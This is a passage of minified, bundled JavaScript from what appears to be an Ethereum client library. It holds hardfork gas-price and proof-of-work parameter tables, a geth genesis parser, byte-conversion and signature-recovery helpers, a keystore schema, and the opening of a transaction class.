                            d: "Base fee of the CODECOPY opcode"
                        },
                        gasprice: {
                            v: 2,
                            d: "Base fee of the GASPRICE opcode"
                        },
                        extcodesize: {
                            v: 20,
                            d: "Base fee of the EXTCODESIZE opcode"
                        },
                        extcodecopy: {
                            v: 20,
                            d: "Base fee of the EXTCODECOPY opcode"
                        },
                        blockhash: {
                            v: 20,
                            d: "Base fee of the BLOCKHASH opcode"
                        },
                        coinbase: {
                            v: 2,
                            d: "Base fee of the COINBASE opcode"
                        },
                        timestamp: {
                            v: 2,
                            d: "Base fee of the TIMESTAMP opcode"
                        },
                        number: {
                            v: 2,
                            d: "Base fee of the NUMBER opcode"
                        },
                        difficulty: {
                            v: 2,
                            d: "Base fee of the DIFFICULTY opcode"
                        },
                        gaslimit: {
                            v: 2,
                            d: "Base fee of the GASLIMIT opcode"
                        },
                        pop: {
                            v: 2,
                            d: "Base fee of the POP opcode"
                        },
                        mload: {
                            v: 3,
                            d: "Base fee of the MLOAD opcode"
                        },
                        mstore: {
                            v: 3,
                            d: "Base fee of the MSTORE opcode"
                        },
                        mstore8: {
                            v: 3,
                            d: "Base fee of the MSTORE8 opcode"
                        },
                        sstore: {
                            v: 0,
                            d: "Base fee of the SSTORE opcode"
                        },
                        jump: {
                            v: 8,
                            d: "Base fee of the JUMP opcode"
                        },
                        jumpi: {
                            v: 10,
                            d: "Base fee of the JUMPI opcode"
                        },
                        pc: {
                            v: 2,
                            d: "Base fee of the PC opcode"
                        },
                        msize: {
                            v: 2,
                            d: "Base fee of the MSIZE opcode"
                        },
                        gas: {
                            v: 2,
                            d: "Base fee of the GAS opcode"
                        },
                        push: {
                            v: 3,
                            d: "Base fee of the PUSH opcode"
                        },
                        dup: {
                            v: 3,
                            d: "Base fee of the DUP opcode"
                        },
                        swap: {
                            v: 3,
                            d: "Base fee of the SWAP opcode"
                        },
                        callcode: {
                            v: 40,
                            d: "Base fee of the CALLCODE opcode"
                        },
                        return: {
                            v: 0,
                            d: "Base fee of the RETURN opcode"
                        },
                        invalid: {
                            v: 0,
                            d: "Base fee of the INVALID opcode"
                        },
                        selfdestruct: {
                            v: 0,
                            d: "Base fee of the SELFDESTRUCT opcode"
                        }
                    },
                    vm: {
                        stackLimit: {
                            v: 1024,
                            d: "Maximum size of VM stack allowed"
                        },
                        callCreateDepth: {
                            v: 1024,
                            d: "Maximum depth of call/create stack"
                        },
                        maxExtraDataSize: {
                            v: 32,
                            d: "Maximum size extra data may be after Genesis"
                        }
                    },
                    pow: {
                        minimumDifficulty: {
                            v: 131072,
                            d: "The minimum that the difficulty may ever be"
                        },
                        difficultyBoundDivisor: {
                            v: 2048,
                            d: "The bound divisor of the difficulty, used in the update calculations"
                        },
                        durationLimit: {
                            v: 13,
                            d: "The decision boundary on the blocktime duration used to determine whether difficulty should go up or not"
                        },
                        epochDuration: {
                            v: 3e4,
                            d: "Duration between proof-of-work epochs"
                        },
                        timebombPeriod: {
                            v: 1e5,
                            d: "Exponential difficulty timebomb period"
                        },
                        minerReward: {
                            v: "5000000000000000000",
                            d: "the amount a miner get rewarded for mining a block"
                        },
                        difficultyBombDelay: {
                            v: 0,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            1353: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "constantinople",
                    comment: "Postponed hardfork including EIP-1283 (SSTORE gas metering changes)",
                    url: "https://eips.ethereum.org/EIPS/eip-1013",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        netSstoreNoopGas: {
                            v: 200,
                            d: "Once per SSTORE operation if the value doesn't change"
                        },
                        netSstoreInitGas: {
                            v: 2e4,
                            d: "Once per SSTORE operation from clean zero"
                        },
                        netSstoreCleanGas: {
                            v: 5e3,
                            d: "Once per SSTORE operation from clean non-zero"
                        },
                        netSstoreDirtyGas: {
                            v: 200,
                            d: "Once per SSTORE operation from dirty"
                        },
                        netSstoreClearRefund: {
                            v: 15e3,
                            d: "Once per SSTORE operation for clearing an originally existing storage slot"
                        },
                        netSstoreResetRefund: {
                            v: 4800,
                            d: "Once per SSTORE operation for resetting to the original non-zero value"
                        },
                        netSstoreResetClearRefund: {
                            v: 19800,
                            d: "Once per SSTORE operation for resetting to the original zero value"
                        },
                        shl: {
                            v: 3,
                            d: "Base fee of the SHL opcode"
                        },
                        shr: {
                            v: 3,
                            d: "Base fee of the SHR opcode"
                        },
                        sar: {
                            v: 3,
                            d: "Base fee of the SAR opcode"
                        },
                        extcodehash: {
                            v: 400,
                            d: "Base fee of the EXTCODEHASH opcode"
                        },
                        create2: {
                            v: 32e3,
                            d: "Base fee of the CREATE2 opcode"
                        }
                    },
                    vm: {},
                    pow: {
                        minerReward: {
                            v: "2000000000000000000",
                            d: "The amount a miner gets rewarded for mining a block"
                        },
                        difficultyBombDelay: {
                            v: 5e6,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            3810: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "dao",
                    comment: "DAO rescue hardfork",
                    url: "https://eips.ethereum.org/EIPS/eip-779",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            6257: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "grayGlacier",
                    comment: "Delaying the difficulty bomb to Mid September 2022",
                    url: "https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/gray-glacier.md",
                    status: "Draft",
                    eips: [
                        5133
                    ],
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {}
                };
            },
            7446: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "homestead",
                    comment: "Homestead hardfork with protocol and network changes",
                    url: "https://eips.ethereum.org/EIPS/eip-606",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        delegatecall: {
                            v: 40,
                            d: "Base fee of the DELEGATECALL opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            9137: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.hardforks = void 0;
                const i = n(r(9454)), o = n(r(3810)), s = n(r(7446)), a = n(r(7458)), u = n(r(2546)), c = n(r(7251)), l = n(r(1353)), d = n(r(5338)), h = n(r(9597)), f = n(r(7931)), p = n(r(9126)), m = n(r(1233)), g = n(r(2761)), y = n(r(3923)), v = n(r(6257)), b = n(r(6697)), E = n(r(6668));
                t.hardforks = {
                    chainstart: i.default,
                    homestead: s.default,
                    dao: o.default,
                    tangerineWhistle: a.default,
                    spuriousDragon: u.default,
                    byzantium: c.default,
                    constantinople: l.default,
                    petersburg: d.default,
                    istanbul: h.default,
                    muirGlacier: f.default,
                    berlin: p.default,
                    london: m.default,
                    shanghai: g.default,
                    arrowGlacier: y.default,
                    grayGlacier: v.default,
                    mergeForkIdTransition: b.default,
                    merge: E.default
                };
            },
            9597: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "istanbul",
                    comment: "HF targeted for December 2019 following the Constantinople/Petersburg HF",
                    url: "https://eips.ethereum.org/EIPS/eip-1679",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        blake2Round: {
                            v: 1,
                            d: "Gas cost per round for the Blake2 F precompile"
                        },
                        ecAdd: {
                            v: 150,
                            d: "Gas costs for curve addition precompile"
                        },
                        ecMul: {
                            v: 6e3,
                            d: "Gas costs for curve multiplication precompile"
                        },
                        ecPairing: {
                            v: 45e3,
                            d: "Base gas costs for curve pairing precompile"
                        },
                        ecPairingWord: {
                            v: 34e3,
                            d: "Gas costs regarding curve pairing precompile input length"
                        },
                        txDataNonZero: {
                            v: 16,
                            d: "Per byte of data attached to a transaction that is not equal to zero. NOTE: Not payable on data of calls between transactions"
                        },
                        sstoreSentryGasEIP2200: {
                            v: 2300,
                            d: "Minimum gas required to be present for an SSTORE call, not consumed"
                        },
                        sstoreNoopGasEIP2200: {
                            v: 800,
                            d: "Once per SSTORE operation if the value doesn't change"
                        },
                        sstoreDirtyGasEIP2200: {
                            v: 800,
                            d: "Once per SSTORE operation if a dirty value is changed"
                        },
                        sstoreInitGasEIP2200: {
                            v: 2e4,
                            d: "Once per SSTORE operation from clean zero to non-zero"
                        },
                        sstoreInitRefundEIP2200: {
                            v: 19200,
                            d: "Once per SSTORE operation for resetting to the original zero value"
                        },
                        sstoreCleanGasEIP2200: {
                            v: 5e3,
                            d: "Once per SSTORE operation from clean non-zero to something else"
                        },
                        sstoreCleanRefundEIP2200: {
                            v: 4200,
                            d: "Once per SSTORE operation for resetting to the original non-zero value"
                        },
                        sstoreClearRefundEIP2200: {
                            v: 15e3,
                            d: "Once per SSTORE operation for clearing an originally existing storage slot"
                        },
                        balance: {
                            v: 700,
                            d: "Base fee of the BALANCE opcode"
                        },
                        extcodehash: {
                            v: 700,
                            d: "Base fee of the EXTCODEHASH opcode"
                        },
                        chainid: {
                            v: 2,
                            d: "Base fee of the CHAINID opcode"
                        },
                        selfbalance: {
                            v: 5,
                            d: "Base fee of the SELFBALANCE opcode"
                        },
                        sload: {
                            v: 800,
                            d: "Base fee of the SLOAD opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            1233: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "london",
                    comment: "HF targeted for July 2021 following the Berlin fork",
                    url: "https://github.com/ethereum/eth1.0-specs/blob/master/network-upgrades/mainnet-upgrades/london.md",
                    status: "Final",
                    eips: [
                        1559,
                        3198,
                        3529,
                        3541
                    ]
                };
            },
            6668: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "merge",
                    comment: "Hardfork to upgrade the consensus mechanism to Proof-of-Stake",
                    url: "https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/merge.md",
                    status: "Final",
                    consensus: {
                        type: "pos",
                        algorithm: "casper",
                        casper: {}
                    },
                    eips: [
                        3675,
                        4399
                    ]
                };
            },
            6697: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "mergeForkIdTransition",
                    comment: "Pre-merge hardfork to fork off non-upgraded clients",
                    url: "https://eips.ethereum.org/EIPS/eip-3675",
                    status: "Draft",
                    eips: []
                };
            },
            7931: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "muirGlacier",
                    comment: "HF to delay the difficulty bomb",
                    url: "https://eips.ethereum.org/EIPS/eip-2384",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {},
                    vm: {},
                    pow: {
                        difficultyBombDelay: {
                            v: 9e6,
                            d: "the amount of blocks to delay the difficulty bomb with"
                        }
                    }
                };
            },
            5338: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "petersburg",
                    comment: "Aka constantinopleFix, removes EIP-1283, activate together with or after constantinople",
                    url: "https://eips.ethereum.org/EIPS/eip-1716",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        netSstoreNoopGas: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreInitGas: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreCleanGas: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreDirtyGas: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreClearRefund: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreResetRefund: {
                            v: null,
                            d: "Removed along EIP-1283"
                        },
                        netSstoreResetClearRefund: {
                            v: null,
                            d: "Removed along EIP-1283"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            2761: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "shanghai",
                    comment: "Next feature hardfork after the merge hardfork having withdrawals, warm coinbase, push0, limit/meter initcode",
                    url: "https://github.com/ethereum/execution-specs/blob/master/network-upgrades/mainnet-upgrades/shanghai.md",
                    status: "Final",
                    eips: [
                        3651,
                        3855,
                        3860,
                        4895
                    ]
                };
            },
            2546: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "spuriousDragon",
                    comment: "HF with EIPs for simple replay attack protection, EXP cost increase, state trie clearing, contract code size limit",
                    url: "https://eips.ethereum.org/EIPS/eip-607",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        expByte: {
                            v: 50,
                            d: "Times ceil(log256(exponent)) for the EXP instruction"
                        }
                    },
                    vm: {
                        maxCodeSize: {
                            v: 24576,
                            d: "Maximum length of contract code"
                        }
                    },
                    pow: {}
                };
            },
            7458: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.default = {
                    name: "tangerineWhistle",
                    comment: "Hardfork with gas cost changes for IO-heavy operations",
                    url: "https://eips.ethereum.org/EIPS/eip-608",
                    status: "Final",
                    gasConfig: {},
                    gasPrices: {
                        sload: {
                            v: 200,
                            d: "Once per SLOAD operation"
                        },
                        call: {
                            v: 700,
                            d: "Once per CALL operation & message call transaction"
                        },
                        extcodesize: {
                            v: 700,
                            d: "Base fee of the EXTCODESIZE opcode"
                        },
                        extcodecopy: {
                            v: 700,
                            d: "Base fee of the EXTCODECOPY opcode"
                        },
                        balance: {
                            v: 400,
                            d: "Base fee of the BALANCE opcode"
                        },
                        delegatecall: {
                            v: 700,
                            d: "Base fee of the DELEGATECALL opcode"
                        },
                        callcode: {
                            v: 700,
                            d: "Base fee of the CALLCODE opcode"
                        },
                        selfdestruct: {
                            v: 5e3,
                            d: "Base fee of the SELFDESTRUCT opcode"
                        }
                    },
                    vm: {},
                    pow: {}
                };
            },
            8317: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(6664), t), i(r(4443), t), i(r(850), t), i(r(2290), t);
            },
            850: (e, t)=>{
                "use strict";
                var r;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.TypeOutput = void 0, (r = t.TypeOutput || (t.TypeOutput = {}))[r.Number = 0] = "Number", r[r.BigInt = 1] = "BigInt", r[r.Uint8Array = 2] = "Uint8Array", r[r.PrefixedHexString = 3] = "PrefixedHexString";
            },
            2290: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.toType = t.ecrecover = t.bigIntToUnpaddedUint8Array = t.bigIntToHex = t.unpadUint8Array = t.stripZeros = t.setLengthLeft = t.assertIsUint8Array = t.zeros = t.bigIntToUint8Array = t.uint8ArrayToBigInt = t.toUint8Array = t.intToUint8Array = t.padToEven = t.parseGethGenesis = t.stripHexPrefix = void 0;
                const n = r(7345), i = r(9634), o = r(4555), s = r(4443), a = r(850);
                t.stripHexPrefix = (e)=>{
                    if ("string" != typeof e) throw new Error("[stripHexPrefix] input must be type 'string', received " + typeof e);
                    return (0, n.isHexPrefixed)(e) ? e.slice(2) : e;
                };
                const u = function(e) {
                    if (!Number.isSafeInteger(e) || e < 0) throw new Error(`Received an invalid integer type: ${e}`);
                    return `0x${e.toString(16)}`;
                };
                function c(e) {
                    let t = e;
                    if ("string" != typeof t) throw new Error("[padToEven] value must be type 'string', received " + typeof t);
                    return t.length % 2 && (t = `0${t}`), t;
                }
                function l(e) {
                    const t = (0, i.bytesToHex)(e);
                    return "0x" === t ? BigInt(0) : BigInt(t);
                }
                function d(e) {
                    return (0, t.toUint8Array)(`0x${e.toString(16)}`);
                }
                function h(e) {
                    if (!(e instanceof Uint8Array)) throw new Error(`This method only supports Uint8Array but input was: ${e}`);
                }
                function f(e) {
                    let t = e[0];
                    for(; e.length > 0 && "0" === t.toString();)t = (e = e.slice(1))[0];
                    return e;
                }
                t.parseGethGenesis = function(e, r, i) {
                    try {
                        if ([
                            "config",
                            "difficulty",
                            "gasLimit",
                            "alloc"
                        ].some((t)=>!(t in e))) throw new Error("Invalid format, expected geth genesis fields missing");
                        return void 0 !== r && (e.name = r), function(e, r = !0) {
                            var i, o;
                            const { name: a, config: c, difficulty: l, mixHash: d, gasLimit: h, coinbase: f, baseFeePerGas: p } = e;
                            let { extraData: m, timestamp: g, nonce: y } = e;
                            const v = Number(g), { chainId: b } = c;
                            if ("" === m && (m = "0x"), (0, n.isHexPrefixed)(g) || (g = u(parseInt(g))), 18 !== y.length && (y = function(e) {
                                return e && "0x0" !== e ? (0, n.isHexPrefixed)(e) ? `0x${(0, t.stripHexPrefix)(e).padStart(16, "0")}` : `0x${e.padStart(16, "0")}` : "0x0000000000000000";
                            }(y)), c.eip155Block !== c.eip158Block) throw new Error("EIP155 block number must equal EIP 158 block number since both are part of SpuriousDragon hardfork and the client only supports activating the full hardfork");
                            const E = {
                                name: a,
                                chainId: b,
                                networkId: b,
                                genesis: {
                                    timestamp: g,
                                    gasLimit: parseInt(h),
                                    difficulty: parseInt(l),
                                    nonce: y,
                                    extraData: m,
                                    mixHash: d,
                                    coinbase: f,
                                    baseFeePerGas: p
                                },
                                hardfork: void 0,
                                hardforks: [],
                                bootstrapNodes: [],
                                consensus: void 0 !== c.clique ? {
                                    type: "poa",
                                    algorithm: "clique",
                                    clique: {
                                        period: null !== (i = c.clique.period) && void 0 !== i ? i : c.clique.blockperiodseconds,
                                        epoch: null !== (o = c.clique.epoch) && void 0 !== o ? o : c.clique.epochlength
                                    }
                                } : {
                                    type: "pow",
                                    algorithm: "ethash",
                                    ethash: {}
                                }
                            }, A = {
                                [s.Hardfork.Homestead]: {
                                    name: "homesteadBlock"
                                },
                                [s.Hardfork.Dao]: {
                                    name: "daoForkBlock"
                                },
                                [s.Hardfork.TangerineWhistle]: {
                                    name: "eip150Block"
                                },
                                [s.Hardfork.SpuriousDragon]: {
                                    name: "eip155Block"
                                },
                                [s.Hardfork.Byzantium]: {
                                    name: "byzantiumBlock"
                                },
                                [s.Hardfork.Constantinople]: {
                                    name: "constantinopleBlock"
                                },
                                [s.Hardfork.Petersburg]: {
                                    name: "petersburgBlock"
                                },
                                [s.Hardfork.Istanbul]: {
                                    name: "istanbulBlock"
                                },
                                [s.Hardfork.MuirGlacier]: {
                                    name: "muirGlacierBlock"
                                },
                                [s.Hardfork.Berlin]: {
                                    name: "berlinBlock"
                                },
                                [s.Hardfork.London]: {
                                    name: "londonBlock"
                                },
                                [s.Hardfork.MergeForkIdTransition]: {
                                    name: "mergeForkBlock",
                                    postMerge: r
                                },
                                [s.Hardfork.Shanghai]: {
                                    name: "shanghaiTime",
                                    postMerge: !0,
                                    isTimestamp: !0
                                },
                                [s.Hardfork.ShardingForkDev]: {
                                    name: "shardingForkTime",
                                    postMerge: !0,
                                    isTimestamp: !0
                                }
                            }, _ = Object.keys(A).reduce((e, t)=>(e[A[t].name] = t, e), {}), w = Object.keys(c).filter((e)=>void 0 !== _[e] && void 0 !== c[e] && null !== c[e]);
                            if (E.hardforks = w.map((e)=>({
                                    name: _[e],
                                    block: !0 === A[_[e]].isTimestamp || "number" != typeof c[e] ? null : c[e],
                                    timestamp: !0 === A[_[e]].isTimestamp && "number" == typeof c[e] ? c[e] : void 0
                                })).filter((e)=>null !== e.block || void 0 !== e.timestamp), E.hardforks.sort((e, t)=>{
                                var r, n;
                                return (null !== (r = e.block) && void 0 !== r ? r : 1 / 0) - (null !== (n = t.block) && void 0 !== n ? n : 1 / 0);
                            }), E.hardforks.sort((e, t)=>{
                                var r, n;
                                return (null !== (r = e.timestamp) && void 0 !== r ? r : v) - (null !== (n = t.timestamp) && void 0 !== n ? n : v);
                            }), void 0 !== c.terminalTotalDifficulty) {
                                const e = {
                                    name: s.Hardfork.Merge,
                                    ttd: c.terminalTotalDifficulty,
                                    block: null
                                }, t = E.hardforks.findIndex((e)=>{
                                    var t;
                                    return !0 === (null === (t = A[e.name]) || void 0 === t ? void 0 : t.postMerge);
                                });
                                -1 !== t ? E.hardforks.splice(t, 0, e) : E.hardforks.push(e);
                            }
                            const T = E.hardforks.length > 0 ? E.hardforks.slice(-1)[0] : void 0;
                            return E.hardfork = null == T ? void 0 : T.name, E.hardforks.unshift({
                                name: s.Hardfork.Chainstart,
                                block: 0
                            }), E;
                        }(e, i);
                    } catch (e) {
                        throw new Error(`Error parsing parameters file: ${e.message}`);
                    }
                }, t.padToEven = c, t.intToUint8Array = function(e) {
                    const t = u(e);
                    return (0, i.hexToBytes)(`0x${c(t.slice(2))}`);
                }, t.toUint8Array = function(e) {
                    if (null == e) return new Uint8Array;
                    if (e instanceof Uint8Array) return e;
                    if (Array.isArray(e)) return Uint8Array.from(e);
                    if ("string" == typeof e) {
                        if (!(0, n.isHexString)(e)) throw new Error(`Cannot convert string to Uint8Array. only supports 0x-prefixed hex strings and this string was given: ${e}`);
                        return (0, i.hexToBytes)(c((0, t.stripHexPrefix)(e)));
                    }
                    if ("number" == typeof e) return (0, t.toUint8Array)((0, i.numberToHex)(e));
                    if ("bigint" == typeof e) {
                        if (e < BigInt(0)) throw new Error(`Cannot convert negative bigint to Uint8Array. Given: ${e}`);
                        let r = e.toString(16);
                        return r.length % 2 && (r = `0${r}`), (0, t.toUint8Array)(`0x${r}`);
                    }
                    if (e.toArray) return Uint8Array.from(e.toArray());
                    throw new Error("invalid type");
                }, t.uint8ArrayToBigInt = l, t.bigIntToUint8Array = d, t.zeros = function(e) {
                    return new Uint8Array(e).fill(0);
                }, t.assertIsUint8Array = h, t.setLengthLeft = function(e, r) {
                    return h(e), function(e, r, n) {
                        const i = (0, t.zeros)(r);
                        return e.length < r ? (i.set(e, r - e.length), i) : e.subarray(-r);
                    }(e, r);
                }, t.stripZeros = f, t.unpadUint8Array = function(e) {
                    return h(e), f(e);
                }, t.bigIntToHex = (e)=>`0x${e.toString(16)}`, t.bigIntToUnpaddedUint8Array = function(e) {
                    return (0, t.unpadUint8Array)(d(e));
                }, t.ecrecover = function(e, t, r, n, i) {
                    const s = function(e, t) {
                        return e === BigInt(0) || e === BigInt(1) ? e : void 0 === t ? e - BigInt(27) : e - (t * BigInt(2) + BigInt(35));
                    }(t, i);
                    if (!function(e) {
                        return e === BigInt(0) || e === BigInt(1);
                    }(s)) throw new Error("Invalid signature v value");
                    return new o.secp256k1.Signature(l(r), l(n)).addRecoveryBit(Number(s)).recoverPublicKey(e).toRawBytes(!1).slice(1);
                }, t.toType = function(e, r) {
                    if (null === e) return null;
                    if (void 0 === e) return;
                    if ("string" == typeof e && !(0, n.isHexString)(e)) throw new Error(`A string must be provided with a 0x-prefix, given: ${e}`);
                    if ("number" == typeof e && !Number.isSafeInteger(e)) throw new Error("The provided number is greater than MAX_SAFE_INTEGER (please use an alternative input type)");
                    const o = (0, t.toUint8Array)(e);
                    switch(r){
                        case a.TypeOutput.Uint8Array:
                            return o;
                        case a.TypeOutput.BigInt:
                            return l(o);
                        case a.TypeOutput.Number:
                            {
                                const e = l(o);
                                if (e > BigInt(Number.MAX_SAFE_INTEGER)) throw new Error("The provided number is greater than MAX_SAFE_INTEGER (please use an alternative output type)");
                                return Number(e);
                            }
                        case a.TypeOutput.PrefixedHexString:
                            return (0, i.bytesToHex)(o);
                        default:
                            throw new Error("unknown outputType");
                    }
                };
            },
            9247: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(8632), t), i(r(1560), t), i(r(4874), t), i(r(5774), t), i(r(8317), t), i(r(9275), t);
            },
            5774: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.keyStoreSchema = void 0, t.keyStoreSchema = {
                    type: "object",
                    required: [
                        "crypto",
                        "id",
                        "version",
                        "address"
                    ],
                    properties: {
                        crypto: {
                            type: "object",
                            required: [
                                "cipher",
                                "ciphertext",
                                "cipherparams",
                                "kdf",
                                "kdfparams",
                                "mac"
                            ],
                            properties: {
                                cipher: {
                                    type: "string"
                                },
                                ciphertext: {
                                    type: "string"
                                },
                                cipherparams: {
                                    type: "object"
                                },
                                kdf: {
                                    type: "string"
                                },
                                kdfparams: {
                                    type: "object"
                                },
                                salt: {
                                    type: "string"
                                },
                                mac: {
                                    type: "string"
                                }
                            }
                        },
                        id: {
                            type: "string"
                        },
                        version: {
                            type: "number"
                        },
                        address: {
                            type: "string"
                        }
                    }
                };
            },
            7592: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Address = void 0;
                const n = r(7423), i = r(9634), o = r(4555), s = r(2290);
                class a {
                    constructor(e){
                        if (20 !== e.length) throw new Error("Invalid address length");
                        this.buf = e;
                    }
                    static zero() {
                        return new a((0, s.zeros)(20));
                    }
                    equals(e) {
                        return (0, i.uint8ArrayEquals)(this.buf, e.buf);
                    }
                    isZero() {
                        return this.equals(a.zero());
                    }
                    toString() {
                        return (0, i.bytesToHex)(this.buf);
                    }
                    toArray() {
                        return this.buf;
                    }
                    static publicToAddress(e, t = !1) {
                        let r = e;
                        if ((0, s.assertIsUint8Array)(r), t && 64 !== r.length && (r = o.secp256k1.ProjectivePoint.fromHex(r).toRawBytes(!1).slice(1)), 64 !== r.length) throw new Error("Expected pubKey to be of length 64");
                        return (0, n.keccak256)(r).slice(-20);
                    }
                }
                t.Address = a;
            },
            915: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.BaseTransaction = void 0;
                const n = r(9634), i = r(4555), o = r(8317), s = r(9964), a = r(7592), u = r(4562);
                t.BaseTransaction = class {
                    constructor(e, t){
                        var r, n;
                        this.cache = {
                            hash: void 0,
                            dataFee: void 0
                        }, this.activeCapabilities = [], this.DEFAULT_CHAIN = o.Chain.Mainnet, this.DEFAULT_HARDFORK = o.Hardfork.Merge;
                        const { nonce: i, gasLimit: s, to: c, value: l, data: d, v: h, r: f, s: p, type: m } = e;
                        this._type = Number((0, o.uint8ArrayToBigInt)((0, o.toUint8Array)(m))), this.txOptions = t;
                        const g = (0, o.toUint8Array)("" === c ? "0x" : c), y = (0, o.toUint8Array)("" === h ? "0x" : h), v = (0, o.toUint8Array)("" === f ? "0x" : f), b = (0, o.toUint8Array)("" === p ? "0x" : p);
                        this.nonce = (0, o.uint8ArrayToBigInt)((0, o.toUint8Array)("" === i ? "0x" : i)), this.gasLimit = (0, o.uint8ArrayToBigInt)((0, o.toUint8Array)("" === s ? "0x" : s)), this.to = g.length > 0 ? new a.Address(g) : void 0, this.value = (0, o.uint8ArrayToBigInt)((0, o.toUint8Array)("" === l ? "0x" : l)), this.data = (0, o.toUint8Array)("" === d ? "0x" : d), this.v = y.length > 0 ? (0, o.uint8ArrayToBigInt)(y) : void 0, this.r = v.length > 0 ? (0, o.uint8ArrayToBigInt)(v) : void 0, this.s = b.length > 0 ? (0, o.uint8ArrayToBigInt)(b) : void 0, this._validateCannotExceedMaxInteger({
                            value: this.value,
                            r: this.r,
                            s: this.s
                        }), this._validateCannotExceedMaxInteger({
                            gasLimit: this.gasLimit
                        }, 64), this._validateCannotExceedMaxInteger({
                            nonce: this.nonce
                        }, 64, !0);
                        const E = void 0 === this.to || null === this.to, A = null !== (r = t.allowUnlimitedInitCodeSize) && void 0 !== r && r, _ = null !== (n = t.common) && void 0 !== n ? n : this._getCommon();
                        E && _.isActivatedEIP(3860) && !A && (0, u.checkMaxInitCodeSize)(_, this.data.length);
                    }
                    get type() {
                        return this._type;
                    }
                    supports(e) {
                        return this.activeCapabilities.includes(e);
                    }
                    validate(e = !1) {
                        const t = [];
                        return this.getBaseFee() > this.gasLimit && t.push(`gasLimit is too low. given ${this.gasLimit}, need at least ${this.getBaseFee()}`), this.isSigned() && !this.verifySignature() && t.push("Invalid Signature"), e ? t : 0 === t.length;
                    }
                    _validateYParity() {
                        const { v: e } = this;
                        if (void 0 !== e && e !== BigInt(0) && e !== BigInt(1)) {
                            const e = this._errorMsg("The y-parity of the transaction should either be 0 or 1");
                            throw new Error(e);
                        }
                    }
                    _validateHighS() {
                        const { s: e } = this;
                        if (this.common.gteHardfork("homestead") && void 0 !== e && e > i.SECP256K1_ORDER_DIV_2) {
                            const e = this._errorMsg("Invalid Signature: s-values greater than secp256k1n/2 are considered invalid");
                            throw new Error(e);
                        }
                    }
                    getBaseFee() {
